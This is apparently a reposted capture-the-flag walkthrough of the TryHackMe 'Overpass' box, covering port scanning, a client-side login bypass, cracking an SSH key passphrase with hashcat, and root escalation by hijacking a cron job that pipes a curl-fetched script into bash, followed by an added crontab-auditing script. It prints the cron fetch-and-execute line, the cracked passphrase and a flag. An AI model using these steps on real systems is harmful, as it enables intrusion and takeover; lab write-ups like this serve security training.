THM Box Walkthrough: Overpass

admin, 2024-07-14 11:14:17

THM box: Overpass

Key points
1. Analysing the JavaScript login check

2. Modifying the response to bypass the check

3. Extracting the hash with ssh2john and cracking it with john

4. Privilege escalation via a cron job reverse shell



Port scanning

─# nmap 10.10.32.202 -T5
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-27 21:00 CST
Nmap scan report for 10.10.32.202
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 2.86 seconds

┌──(root㉿kali)-[/tmp]
└─# nmap 10.10.32.202 -T5 -p 22,80 -A
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-27 21:01 CST
Nmap scan report for 10.10.32.202
Host is up (0.31s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   207.90 ms 10.2.0.1
2   ... 3
4   336.96 ms 10.10.32.202

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.56 seconds


Directory scanning

└─# dirsearch -u 10.10.32.202 -x 403,301

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.10.32.202_24-03-27_21-04-27.txt

Error Log: /root/.dirsearch/logs/errors-24-03-27_21-04-27.log

Target: http://10.10.32.202/

[21:04:28] Starting:
[21:04:50] 200 -  782B  - /404.html
[21:05:07] 200 -    1KB - /admin.html
[21:05:08] 200 -    1KB - /admin/
[21:05:08] 200 -    1KB - /admin/?/login
[21:05:44] 200 -    2KB - /downloads/
[21:06:01] 200 -    2KB - /login.js
[21:06:03] 200 -   28B  - /main.js

Task Completed



Exploitation: analysing the JS file

http://10.10.67.242/login.js

async function postData(url = '', data = {}) {
    // Default options are marked with *
    const response = await fetch(url, {
        method: 'POST', // *GET, POST, PUT, DELETE, etc.
        cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
        credentials: 'same-origin', // include, *same-origin, omit
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        },
        redirect: 'follow', // manual, *follow, error
        referrerPolicy: 'no-referrer', // no-referrer, *client
        body: encodeFormData(data) // body data type must match "Content-Type" header
    });
    return response; // We don't always want JSON back
}

const encodeFormData = (data) => {
    return Object.keys(data)
        .map(key => encodeURIComponent(key) + '=' + encodeURIComponent(data[key]))
        .join('&');
}

function onLoad() {
    document.querySelector("#loginForm").addEventListener("submit", function (event) {
        //on pressing enter
        event.preventDefault()
        login()
    });
}

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}


The client treats any login response other than the exact string "Incorrect credentials" as a successful login: the response body is stored as the SessionToken cookie and the browser is sent to /admin.


Modifying the response to bypass the check

So the login can be bypassed by intercepting the response and changing its body to something other than "Incorrect credentials".


The login succeeds. The admin page shows two user names, James and Paradox, and an id_rsa private key:

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you. Also, we really need to talk about this "Military Grade" encryption. - Paradox

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337

(encrypted key body omitted)
-----END RSA PRIVATE KEY-----


The key is passphrase-protected.



Extracting the hash with ssh2john and cracking the passphrase

Extract the hash with ssh2john, then crack the passphrase:

└─# ssh2john id_rsa > id_rsa_hash

// remove the "ssh:" prefix from the hash file

└─# hashcat id_rsa_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 7 5800H with Radeon Graphics, 1422/2909 MB (512 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$) | Private Key

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

This hash-mode is known to emit multiple valid candidates for the same hash.
Use --keep-guessing to continue attack after finding the first crack.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$sshng$1$16$9f85d92f34f42626f13a7493ab48f337$1200$[...]:james13

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22931 (RSA/DSA/EC/OpenSSH Private Keys ($1, $3$))
Hash.Target......: $sshng$1$16$9f85d92f34f42626f13a7493ab48f337$1200$2...bfc53b
Time.Started.....: Fri Mar 29 21:23:05 2024 (1 sec)
Time.Estimated...: Fri Mar 29 21:23:06 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   351.9 kH/s (0.48ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336/14344385 (0.10%)
Rejected.........: 0/14336 (0.00%)
Restore.Point....: 12288/14344385 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: havana -> cherry13
Hardware.Mon.#1..: Util: 14%

Started: Fri Mar 29 21:22:47 2024
Stopped: Fri Mar 29 21:23:08 2024

The dictionary attack recovers the passphrase: james13.

└─# ssh -i id_rsa james@10.10.229.175

james@overpass-prod:~$ cat user.txt
thm{65c1aaf000506e56996822c6281e6bf7}


Privilege escalation

james@overpass-prod:~$ cat todo.txt
To Do:
> Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
  Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it actually works
> Ask Paradox how he got the automated build script working and where the builds go.
  They're not updating on the website

The system crontab contains a scheduled job of interest:

james@overpass-prod:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Every minute, root fetches buildscript.sh from overpass.thm over plain HTTP and pipes it into bash. Point overpass.thm at the attacking machine's IP, create a /downloads/src directory there and serve it over HTTP, place a reverse shell in it and start a listener; the box is rooted.
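The cron entry is exactly the pattern a defender wants to find before an attacker does: a root job that downloads a script by hostname over plaintext HTTP and pipes it straight into a shell, so whoever controls the name resolution or the network path controls root. As an added example (not from the original write-up), this Node.js script parses text in /etc/crontab format and flags such jobs; the sample crontab is constructed and combines the lines from the box with two benign entries.

```javascript
// Added example (not from the original write-up): flag crontab jobs that fetch
// a script from the network and pipe it straight into a shell, the pattern
// that made the Overpass build job exploitable. Heuristic regexes, not a parser
// of every curl/wget option.
const FETCHER = /\b(curl|wget|fetch)\b/;
const SHELL_SINK = /\|\s*(ba|z|da|k)?sh\b/;              // "... | bash", "| sh"
const PLAINTEXT_URL = /\bhttp:\/\//;                      // explicit http://
// Bare host with no scheme (as in the box): curl and wget default to http://.
const BARE_HOST_URL = /\b(curl|wget)\s+(?!-)(?!https?:\/\/)[\w.-]+\//;

// Parse system-crontab text (six fields: m h dom mon dow user, then command),
// skipping blank lines, comments and VAR=value assignments.
function parseCrontab(text) {
  return text.split('\n')
    .map(l => l.trim())
    .filter(l => l && !l.startsWith('#') && !/^\w+=/.test(l))
    .map(l => {
      const f = l.split(/\s+/);
      return { schedule: f.slice(0, 5).join(' '), user: f[5], command: f.slice(6).join(' ') };
    });
}

// Return every job with at least one finding, each with its list of reasons.
function auditCrontab(text) {
  const findings = [];
  for (const job of parseCrontab(text)) {
    const reasons = [];
    const fetches = FETCHER.test(job.command);
    if (fetches && SHELL_SINK.test(job.command)) reasons.push('remote script piped into shell');
    if (fetches && (PLAINTEXT_URL.test(job.command) || BARE_HOST_URL.test(job.command)))
      reasons.push('download over plaintext HTTP (no integrity or authenticity check)');
    if (reasons.length && job.user === 'root') reasons.push('runs as root');
    if (reasons.length) findings.push({ ...job, reasons });
  }
  return findings;
}

// Constructed sample: the box's crontab lines plus two benign jobs.
const SAMPLE = `
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * backup /usr/local/bin/backup.sh
`;

console.log(JSON.stringify(auditCrontab(SAMPLE), null, 2));
```

The same function can be run over `/etc/cron.d/*` and per-user crontabs (dropping the user field for the latter) to inventory every privileged fetch-and-execute job on a host.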


Originally published on the WeChat official account ZeroPointZero安全团队 (ZeroPointZero Security Team): THM靶机学习-Overpass

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear all legal and joint liability themselves; this site assumes none. For questions, contact us by e-mail (preferably from a corporate or other valid mailbox so the message is not filtered; contact details are on the home page).
Published by admin on 2024-07-14 11:14:17. When reposting, keep the link to this article (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/2950483.html
